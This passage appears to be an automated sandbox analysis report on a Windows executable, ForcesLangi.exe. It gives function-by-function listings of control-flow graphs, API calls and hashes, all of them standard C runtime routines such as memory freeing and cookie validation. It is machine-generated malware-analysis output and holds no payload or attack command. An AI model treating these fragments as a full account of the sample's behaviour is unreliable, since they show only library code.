                                                                                                                                                                                                                                              control_flow_graph 1958 6ce35400-6ce35414 1959 6ce35482-6ce3548a 1958->1959 1960 6ce35416-6ce3541b 1958->1960 1962 6ce354d1-6ce354e9 call 6ce35571 1959->1962 1963 6ce3548c-6ce3548f 1959->1963 1960->1959 1961 6ce3541d-6ce35422 1960->1961 1961->1959 1964 6ce35424-6ce35427 1961->1964 1972 6ce354ec-6ce354f3 1962->1972 1963->1962 1966 6ce35491-6ce354ce call 6ce32ce7 * 4 1963->1966 1964->1959 1967 6ce35429-6ce35431 1964->1967 1966->1962 1970 6ce35433-6ce35436 1967->1970 1971 6ce3544b-6ce35453 1967->1971 1970->1971 1974 6ce35438-6ce3544a call 6ce32ce7 call 6ce37337 1970->1974 1977 6ce35455-6ce35458 1971->1977 1978 6ce3546d-6ce35481 call 6ce32ce7 * 2 1971->1978 1975 6ce35512-6ce35516 1972->1975 1976 6ce354f5-6ce354f9 1972->1976 1974->1971 1986 6ce35518-6ce3551d 1975->1986 1987 6ce3552e-6ce3553a 1975->1987 1982 6ce354fb-6ce354fe 1976->1982 1983 6ce3550f 1976->1983 1977->1978 1984 6ce3545a-6ce3546c call 6ce32ce7 call 6ce37435 1977->1984 1978->1959 1982->1983 1993 6ce35500-6ce3550e call 6ce32ce7 * 2 1982->1993 1983->1975 1984->1978 1988 6ce3552b 1986->1988 1989 6ce3551f-6ce35522 1986->1989 1987->1972 1991 6ce3553c-6ce35547 call 6ce32ce7 1987->1991 1988->1987 1989->1988 1996 6ce35524-6ce3552a call 6ce32ce7 1989->1996 1993->1983 1996->1988
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 6CE35444
                                                                                                                                                                                                                                                • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE37354
                                                                                                                                                                                                                                                • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE37366
                                                                                                                                                                                                                                                • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE37378
                                                                                                                                                                                                                                                • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE3738A
                                                                                                                                                                                                                                                • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE3739C
                                                                                                                                                                                                                                                • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE373AE
                                                                                                                                                                                                                                                • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE373C0
                                                                                                                                                                                                                                                • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE373D2
                                                                                                                                                                                                                                                • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE373E4
                                                                                                                                                                                                                                                • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE373F6
                                                                                                                                                                                                                                                • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE37408
                                                                                                                                                                                                                                                • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE3741A
                                                                                                                                                                                                                                                • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE3742C
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE35439
                                                                                                                                                                                                                                                • Part of subcall function 6CE32CE7: HeapFree.KERNEL32(00000000,00000000,?,6CE321F9), ref: 6CE32CFD
                                                                                                                                                                                                                                                • Part of subcall function 6CE32CE7: GetLastError.KERNEL32(?,?,6CE321F9), ref: 6CE32D0F
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE3545B
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE35470
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE3547B
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE3549D
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE354B0
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE354BE
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE354C9
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE35501
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE35508
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE35525
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE3553D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                                              • Opcode ID: 7119f1d783f8dcc2cb7c90c677a98976e3151105aae4a7b3d48de7e0da83f330
                                                                                                                                                                                                                                              • Instruction ID: 2be9316e68ee0aab52d90ec369f6ff8ef0f4fbadc1a0a278569700af7d319bf6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7119f1d783f8dcc2cb7c90c677a98976e3151105aae4a7b3d48de7e0da83f330
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75318A31606260AFEB108A75D804B9673F9BF8031DF306419E49ED7B51DB31F948DB60
                                                                                                                                                                                                                                              Function 6CE32863 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 2101 6ce32863-6ce32876 2102 6ce32882-6ce3292f call 6ce32ce7 * 9 call 6ce3268f call 6ce326fa 2101->2102 2103 6ce32878-6ce32881 call 6ce32ce7 2101->2103 2103->2102
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                              • Opcode ID: 98cef0cddb2d9a2bbac884f51803e4a934fb8a71c3dd38f9658b43591535e356
                                                                                                                                                                                                                                              • Instruction ID: e14ac05b7ac6cf5cce95865c4d3a736f7f16b82e84b6d4f8b7372a726952d24d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98cef0cddb2d9a2bbac884f51803e4a934fb8a71c3dd38f9658b43591535e356
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8321CB76A00118BFCB01DF94CC44DDD7BB8BF98248F105169F55ADBA22DB31EA48CB80
                                                                                                                                                                                                                                              Function 6CE30B00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 2569 6ce30b00-6ce30b51 call 6ce39850 call 6ce30ac0 call 6ce30f47 2576 6ce30b53-6ce30b65 2569->2576 2577 6ce30bad-6ce30bb0 2569->2577 2579 6ce30bd0-6ce30bd9 2576->2579 2580 6ce30b67-6ce30b7e 2576->2580 2578 6ce30bb2-6ce30bbf call 6ce30f30 2577->2578 2577->2579 2585 6ce30bc4-6ce30bcd call 6ce30ac0 2578->2585 2582 6ce30b80-6ce30b8e call 6ce30ed0 2580->2582 2583 6ce30b94 2580->2583 2592 6ce30b90 2582->2592 2593 6ce30ba4-6ce30bab 2582->2593 2584 6ce30b97-6ce30b9c 2583->2584 2584->2580 2587 6ce30b9e-6ce30ba0 2584->2587 2585->2579 2587->2579 2590 6ce30ba2 2587->2590 2590->2585 2594 6ce30b92 2592->2594 2595 6ce30bda-6ce30be3 2592->2595 2593->2585 2594->2584 2596 6ce30be5-6ce30bec 2595->2596 2597 6ce30c1d-6ce30c2d call 6ce30f10 2595->2597 2596->2597 2599 6ce30bee-6ce30bfd call 6ce396f0 2596->2599 2603 6ce30c41-6ce30c5d call 6ce30ac0 call 6ce30ef0 2597->2603 2604 6ce30c2f-6ce30c3e call 6ce30f30 2597->2604 2605 6ce30c1a 2599->2605 2606 6ce30bff-6ce30c17 2599->2606 2604->2603 2605->2597 2606->2605
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6CE30B37
                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6CE30B3F
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6CE30BC8
                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6CE30BF3
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6CE30C48
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                              • Opcode ID: 4476adb15431670f57ef0e9f4e63d0246db99eed4a72024b2f223844a821f11e
                                                                                                                                                                                                                                              • Instruction ID: e2313387b748a4828768098a687a869ff32837e823230e9ea5bbe5487530bc5a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4476adb15431670f57ef0e9f4e63d0246db99eed4a72024b2f223844a821f11e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F641B634A011689FCF00CF69C884ADEBBB5AF4532CF34915AE81C9BB51D735BA46CB90
                                                                                                                                                                                                                                              Function 6CE34328 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                              • API String ID: 0-537541572
                                                                                                                                                                                                                                              • Opcode ID: 662713aa457b060bf2a5e4748e920f9f377c08fe1b1d6f289c0f758329c770a3
                                                                                                                                                                                                                                              • Instruction ID: 02404afaa5dd706c9e755597ad6b00afd795eea9158432bde14e7173a93898c5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 662713aa457b060bf2a5e4748e920f9f377c08fe1b1d6f289c0f758329c770a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F21F931A49634A7CB219A258C44B4A3AB89F03768F312A12E91DAF790D671FC44C6D0
                                                                                                                                                                                                                                              Function 6CE374D6 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CE3749E: _free.LIBCMT ref: 6CE374C3
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE37524
                                                                                                                                                                                                                                                • Part of subcall function 6CE32CE7: HeapFree.KERNEL32(00000000,00000000,?,6CE321F9), ref: 6CE32CFD
                                                                                                                                                                                                                                                • Part of subcall function 6CE32CE7: GetLastError.KERNEL32(?,?,6CE321F9), ref: 6CE32D0F
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE3752F
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE3753A
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE3758E
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE37599
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE375A4
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE375AF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                              • Opcode ID: 7df7bc2e45ad0bb9c7f8bc702183ee147632bc2a3689b57671c2733396f6c7e8
                                                                                                                                                                                                                                              • Instruction ID: 669f7a44da25c574f18ba41fd5e6d33bf8a8a5c3b107915212b49f364aaf5002
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7df7bc2e45ad0bb9c7f8bc702183ee147632bc2a3689b57671c2733396f6c7e8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40114D32540F64F6D630AB70CD05FDB7BA86F41704F60581DA2DDA6A51DB35B90CC750
                                                                                                                                                                                                                                              Function 6CE365EF Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CE36637
                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 6CE3681C
                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 6CE36839
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,6CE34E19,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE36881
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CE368C1
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE36969
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1735259414-0
                                                                                                                                                                                                                                              • Opcode ID: 38039466c0b73660f1a57e8ca7f46a89ef8fa399549c65fc9ae0b6a0e6701fd2
                                                                                                                                                                                                                                              • Instruction ID: ba66bbe62bad3c05ea918ded2909810cb3d187b2e5704fdb8d5be96ee3142eec
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38039466c0b73660f1a57e8ca7f46a89ef8fa399549c65fc9ae0b6a0e6701fd2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48C19175D012689FDF10CFA8C8809DDBBB9BF09318F28516AE859FB741D631A946CF60
                                                                                                                                                                                                                                              Function 6CE30FD7 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000001,?,6CE30CA5,6CE2ECE8,6CE2E6AF,?,6CE2E8E7,?,00000001,?,?,00000001,?,6CE3F8C8,0000000C,6CE2E9E0), ref: 6CE30FE5
                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CE30FF3
                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CE3100C
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,6CE2E8E7,?,00000001,?,?,00000001,?,6CE3F8C8,0000000C,6CE2E9E0,?,00000001,?), ref: 6CE3105E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                              • Opcode ID: baf2d368a663e3fd086bcce10756650e1262356d5b3c6b3ee5c8558503877a51
                                                                                                                                                                                                                                              • Instruction ID: 7da7e9c8620e88f32a8397b8b27a62a830a4f8d431ae5f258c07e3e37c794c2d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: baf2d368a663e3fd086bcce10756650e1262356d5b3c6b3ee5c8558503877a51
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC01D83630E6726EEA1405F55C88E563775DB433BC730132EE12C85AD0EF55E846F698
                                                                                                                                                                                                                                              Function 6CE3366D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\Desktop\ForcesLangi.exe, xrefs: 6CE33672
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\ForcesLangi.exe
                                                                                                                                                                                                                                              • API String ID: 0-1466808870
                                                                                                                                                                                                                                              • Opcode ID: b026a6e39f5f10b098e7da0426f64c07aca047fe2c3eb67a8fd70f5b458b1d60
                                                                                                                                                                                                                                              • Instruction ID: 5ae47eed08b3985edd8f07990a4bd861b2336d540dfe7aba2701f63c893c8609
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b026a6e39f5f10b098e7da0426f64c07aca047fe2c3eb67a8fd70f5b458b1d60
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F21B3B1204225AFDB109A668C88D97B77DAF013BC7245629F45DC7B40EB21FC56CBA0
                                                                                                                                                                                                                                              Function 6CE31153 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,6CE31214,00000000,?,00000001,00000000,?,6CE3128B,00000001,FlsFree,6CE3B344,FlsFree,00000000), ref: 6CE311E3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                              • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                                              • Opcode ID: 92b3b385346ebe6712506d35d43b8aa5483a2f7d6bf3294cff671c1cadb1dd51
                                                                                                                                                                                                                                              • Instruction ID: 60835f865c34a5a7607a86989b14cc80c9290d65e58d6853946fde49798c0ede
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92b3b385346ebe6712506d35d43b8aa5483a2f7d6bf3294cff671c1cadb1dd51
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9811A333B45639ABDF228AE98C44B9937B49F027B8F351214E91CEB780D760F904CAD5
                                                                                                                                                                                                                                              Function 6CE31B67 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CE31B19,?,?,6CE31AE1,?,00000001,?), ref: 6CE31B7C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CE31B8F
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,6CE31B19,?,?,6CE31AE1,?,00000001,?), ref: 6CE31BB2
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                              • Opcode ID: 739af7f1296f14c9ab567f9a6e0ee39e912456cfb9e9271e33966bd05a20a2ce
                                                                                                                                                                                                                                              • Instruction ID: 36840aef5c42c492fbdf76fce1925dd507c87276e09843351a47df091e231d42
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 739af7f1296f14c9ab567f9a6e0ee39e912456cfb9e9271e33966bd05a20a2ce
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7EF01231A41628FBDF119BD1CD09B9D7A79EB4175AF205054E409A2550DB34EA40DB90
                                                                                                                                                                                                                                              Function 6CE37435 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE3744D
                                                                                                                                                                                                                                                • Part of subcall function 6CE32CE7: HeapFree.KERNEL32(00000000,00000000,?,6CE321F9), ref: 6CE32CFD
                                                                                                                                                                                                                                                • Part of subcall function 6CE32CE7: GetLastError.KERNEL32(?,?,6CE321F9), ref: 6CE32D0F
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE3745F
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE37471
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE37483
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE37495
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
